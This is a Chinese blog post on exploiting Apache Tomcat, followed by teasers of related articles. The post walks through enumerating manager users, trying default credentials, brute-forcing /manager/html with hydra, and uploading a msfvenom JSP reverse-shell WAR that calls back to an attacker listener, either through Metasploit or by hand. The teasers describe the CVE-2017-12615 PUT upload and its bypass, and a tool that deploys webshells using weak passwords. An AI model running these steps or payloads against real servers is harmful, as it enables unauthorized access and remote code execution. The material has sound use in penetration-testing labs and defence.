Apache Tomcat 漏洞利用

最新推荐文章于 2025-11-14 17:40:39 发布
原创 最新推荐文章于 2025-11-14 17:40:39 发布 · 3.2k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-NC-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #web安全 #apache

本文详细介绍了如何利用Apache Tomcat的漏洞获取shell。通过枚举Apache Tomcat的用户,使用如msf和hydra等工具,可以尝试爆破用户名和密码。在获取凭证后,可以登录到/manager/html并利用漏洞部署反向shell。当msf不起作用时,可以通过创建自定义的msfvenom payload和设置监听器,或上传.jsp文件来触发RCE。若无法访问/manager/,则需要上传解压后的.war文件中的.jsp文件并访问其URL来触发漏洞。

Apache Tomcat 漏洞利用

参考链接1
参考链接2

通过对apache tomcat的枚举和利用,我们可以从中找出漏洞,然后得到shell

枚举

  • 在 Tomcat6 之前的某些版本中,我们可以使用msf枚举用户:
msf> use auxiliary/scanner/http/tomcat_enum

  • 常见的得到的用户名与密码是:

    • admin:admin
    • tomcat:tomcat
    • admin: NOTHING
    • admin:s3cr3t
    • tomcat:s3cr3t
    • admin:tomcat

  • 当然,我们也可以使用hydra进行暴力破解

hydra -L users.txt -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt -f 10.10.10.64 http-get /manager/html
  • 得到了用户名与密码后,我们就可以登录到 /manager/html下传输反向shell

RCE

  • 我们可以使用msf,当然有时候这个并不起效果
use exploit/multi/http/tomcat_mgr_upload
show options
set RHOSTS 
set RPORT 8080
set HttpPassword 
set HttpUsername 
set LHOST 
exploit
  • 当我们使用msf没有用时,我们可以自己制造一个shell传输到网页上
  • 创建一个msfvenom payload
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.10 LPORT=9999 -f war -o rshell.war
  • 使用msf的监听模块进行监听(这有时候会收不到反弹回来的shell),或者使用nc监听端口
use exploit/multi/handler
show options
set payload java/jsp_shell_reverse_tcp
set LHOST 10.10.14.10
set LPORT 9999
exploit
  • 完成这些后,我们将shell文件传输到web上,如果我们不能访问/manager/,那么就无法进行下一步
  • 点击上传的文件在web中的地址,如果监听器没能收到shell,我们可以解压缩之前使用msfvenom创建的 .war 文件,将里面的 .jsp 文件上传,并且访问其网络链接

点击该文字链接,说的很全面,但是要按情况选择

Apache Tomcat漏洞复现
m0_56578216的博客
09-07 1904
来到vulhub/tomcat/tomcat8/靶场。
漏洞修复:Apache Tomcat 安全漏洞(CVE-2024-50379) | Apache Tomcat 安全漏洞(CVE-2024-52318)
专注于计算机研发知识和资讯分享
01-23 2329
解决方案:升级到最新版Tomcat
这才是真正D.S.T内部用的(tomcat漏洞)扫描工具
07-01
这才是真正D.S.T内部用的(tomcat漏洞)扫描工具解压缩密码: vip2008
腾讯云安全中心监测到  Apache Tomcat 修复了2个严重级别的漏洞
09-25
9 月 19 日,腾讯云安全中心监测到  Apache Tomcat 修复了2个严重级别的漏洞, 分别为: 信息泄露漏洞(CVE-2017-12616)、远程代码执行漏洞(CVE-2017-12615),在某些场景下,攻击者将分别能通过这两个漏洞,获取用户服务器上 JSP 文件的源代码,或是通过精心构造的攻击请求,向用户服务器上传恶意 JSP 文件,通过上传的 JSP 文件 ,可在用户服务器上执行任意代码。      云鼎实验室通过对于漏洞描述,搭建漏洞环境,并对其进行复现。此漏洞为高危漏洞,即使是非默认配置,但是一旦存在漏洞,那么攻击者可以成功上传 webshell,并控制服务器。 复现 根据描述,在 Windows 服务器下,将 readonly 参数设置为 false 时,即可通过 PUT 方式创建一个 JSP 文件,并可以执行任意代码。    通过阅读 conf/web.xml 文件,可以发现:   默认 readonly 为 true,当 readonly 设置为 false 时,可以通过 PUT / DELETE 进行文件操控。   配置 readonly 为 false: 启动 Tomcat利用 PUT 请求创建文件: 提示 404。通过描述中的 Windows 受影响,可以结合 Windows 的特性。其一是 NTFS 文件流,其二是文件名的相关限制(如 Windows 中文件名不能以空格结尾)来绕过限制:  访问发现可以正常输出:  分析 Tomcat 的 Servlet 是在 conf/web.xml 配置的,通过配置文件可知,当后缀名为 .jsp 和 .jspx 的时候,是通过JspServlet处理请求的:   可以得知,“1.jsp ”(末尾有一个和空格)并不能匹配到 JspServlet,而是会交由DefaultServlet去处理。当处理 PUT 请求时: 会调用resources.rebind: dirContext 为FileDirContext: 调用 rebind创建文件: 又由于 Windows 不允许“ ”作为文件名结尾,所以会创建一个 .jsp 文件,导致代码执行。 Bypass 分析 然而,经过黑盒测试,当 PUT 地址为/1.jsp/时,仍然会创建 JSP,会影响 Linux 和 Windows 服务器,并且 Bypass 了之前的补丁,分析如下。  在进入 bind 函数时,会声明一个 File 变量: 进入 File 后,会对 name 进行 normalize 最后得到的 path 就是没有最后 / 的 path 了: 影响  由于存在去掉最后的 / 的特性,那么这个漏洞自然影响 Linux 以及 Windows 版本。而且经过测试,这个漏洞影响全部的 Tomcat 版本,从 5.x 到 9.x 无不中枪。目前来说,最好的解决方式是将 conf/web.xml 中对于 DefaultServlet 的 readonly 设置为 true,才能防止漏洞
【亲测免费】 ApacheTomcatScanner 安装与使用教程
最新发布
gitblog_00831的博客
11-14 593
ApacheTomcatScanner 的源码目录结构如下: ``` . ├── .gitignore # Git 忽略规则文件 ├── ApacheTomcatScanner.py # 主程序文件 ├── LICENSE # 许可证文件 ├── Makefile # 编译构建文件 ├── README.md
如何使用ApacheTomcatScanner扫描Apache Tomcat服务器漏洞
顶峰
02-28 3032
1、支持使用多线程Worker搜索Apache Tomcat服务器;2、支持扫描多个目标:支持接收一个Windows域中的目标计算机列表,支持从文件按行读取目标,支持使用–t/–target选项读取单个目标(IP/DNS/CIDR);3、支持自定义即设置端口列表;4、支持测试/manager/html访问和默认凭证;5、支持使用–list-cves选项查看每个版本的CVE漏洞信息;1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。
Apache Tomcat文件包含漏洞复现(详细教程)
weixin_60838266的博客
07-18 5200
TomcatApache开源组织开发的用于处理HTTP服务的项目,两者都是免费的,都可以做为独立的Web服务器运行。Apache Tomcat服务器存在文件包含漏洞,攻击者可利用漏洞读取或包含 Tomcat 上所有 webapp 目录下的任意文件,如:webapp 配置文件或源代码等。Apache Tomcat服务器通过Connector连接器组件与客户程序建立连接,Connector表示接收请求并返回响应的端点。即Connector组件负责接收客户的请求,以及把Tomcat服务器的响应结果发送给客户。
Apache Tomcat 漏洞复现
来日可期的博客
09-08 5906
Tomcat7 弱密码和后端 Getshell 漏洞,Aapache Tomcat AJP任意文件读取/包含漏洞,通过 PUT 方法的 Tomcat 任意写入文件漏洞
CVE-2022-9484 Apache Tomcat Session 漏洞利用
泷羽Sec-静安
08-15 1138
Groovy示例代码和test说明了,需要目标靶机存在可以被攻击机上上传修改内容的test.seesion的文件,或者攻击机通过别的方式写入session文件,知道session可以访问的路径再请求。可用于tomcat文件上传漏洞中被限制了上传jsp后缀内容的绕过。
【工具推荐】TomcatWeakPassChecker v2.2(最新版本) - Tomcat 漏洞一键漏洞利用getshell
网络安全
09-05 719
一键tomcat漏洞批量弱口令检测、后台部署war包getshell,该脚本用于检查Apache Tomcat管理页面的弱密码,并尝试通过上传自定义WAR包部署Godzilla Webshell。如果成功,将记录成功登录的信息以及获取到的Webshell地址。
Apache Tomcat Scanner
03-15
Apache Tomcat的扫描器,用于检测Tomcat的弱口令。
tomcat漏洞修复
m0_61069946的博客
03-19 7167
X-Content-Type-Options HTTP 消息头相当于一个提示标志,被服务器用来提示客户端一定要遵循在 Content-Type 首部中对 MIME 类型 的设定,而不能对其进行修改。Web 服务器对于 HTTP 请求的响应头中缺少 X-Download-Options,这将导致浏览器提供的安全特性失效。漏洞危害: Web 服务器对于 HTTP 请求的响应头中缺少 X-Download-Options,这将导致浏览器提供的安全特性失效,更容易遭受 Web 前端黑客攻击的影响。
Tomcat漏洞分析利用
weixin_43047908的博客
08-19 1970
目录前言环境搭建漏洞复现CVE-2017-12615CVE-2020-1938 前言 TomcatApache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开发而成。由于有了Sun 的参与和支持,最新的Servlet 和JSP 规范总是能在Tomcat 中得到体现,Tomcat 5支持最新的Servlet 2.4 和JSP 2.0 规范。因为Tomcat 技术先进、性能稳定,而且免费,因而深受Ja
渗透测试——漏洞扫描工具
wuli1024的博客
11-20 4178
然后还要将all这个压缩包里的plugin_feed_info.inc提取出来,命令行是 tar -zxvf all-2.0.tar.gz plugin_feed_info.inc,然鹅,我提取不出来。将下载好的插件移动到Nessus目录下,然后输入sudo /opt/nessus/sbin/nessuscli update all-2.0.tar.gz。用户名和密码随便写写就好,随后将会更新补丁,OK,这样Nessus可以使用了。将会获得一串数字,然后去激活码的这个网站,输入自己的邮箱获取激活码。
tomcat漏洞如何修复
baimaozi008的博客
04-28 2293
Apache Tomcat 是一款广泛使用的开源Java Servlet容器,由于其广泛的使用,它经常成为安全研究和攻击的目标。修复Tomcat中的漏洞是保证Web应用安全的重要一环。
Apache Tomcat 安全漏洞加固指南
乐大厨串串香飘万里
10-24 3473
存在安全漏洞,该漏洞源于如果一个HTTP/2客户端连接到超过约定的最大数量的并发流连接(违反HTTP / 2协议),它是可能的后续请求在该连接可以包含HTTP头信息,包括HTTP / 2伪头,从先前的请求而不是标题。以下产品及版本受到影响:10.0.0-M1版本至10.0.0-M7版本, 9.0.0.M1版本至9.0.37版本,8.5.0版本至8.5.57版本。将旧版本的备份的配置文件以及项目copy到新版本中。关掉旧版本的tomcat,启动新本本的tomcat。备份当前版本的配置文件到新建的目录中。
Tomcat漏洞复现
Bird&Bird
12-28 6333
目录一、漏洞描述二、影响范围三、漏洞分析四、环境搭建五、漏洞复现 一、漏洞描述 2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞,其中就有远程代码执行漏洞(CVE-2017-12615)。当存在漏洞Tomcat 运行在 Windows 主机上,且启用了HTTP PUT请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 的webshell文件,JSP文件中的恶意代码将能被服务
Tomcat文件漏洞问题及处理方式
Doubletree.lin的博客
02-25 5408
学海无涯,旅“途”漫漫,“途”中小记,如有错误,敬请指出,在此拜谢! 一、前情提要 用了万年的tomcat,出现了bug。2月21日,据国家信息安全漏洞共享平台公开的漏洞公告中发现Apache Tomcat文件包含漏洞CNVD-2020-10487(对应CVE-2020-1938),Apache Tomcat服务器中被发现存在文件包含漏洞,攻击者利用漏洞,可在未授权的情况下远程读取特定目录下...
Apache Tomcat 6.0.20 安装包下载
Tomcat经常作为Web应用服务器与Apache HTTP Server等HTTP服务器结合使用,这样可以利用Apache的静态内容处理能力以及Tomcat的动态内容处理能力。 2. **安装与配置**: 安装Tomcat服务器通常涉及下载对应的安装包...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值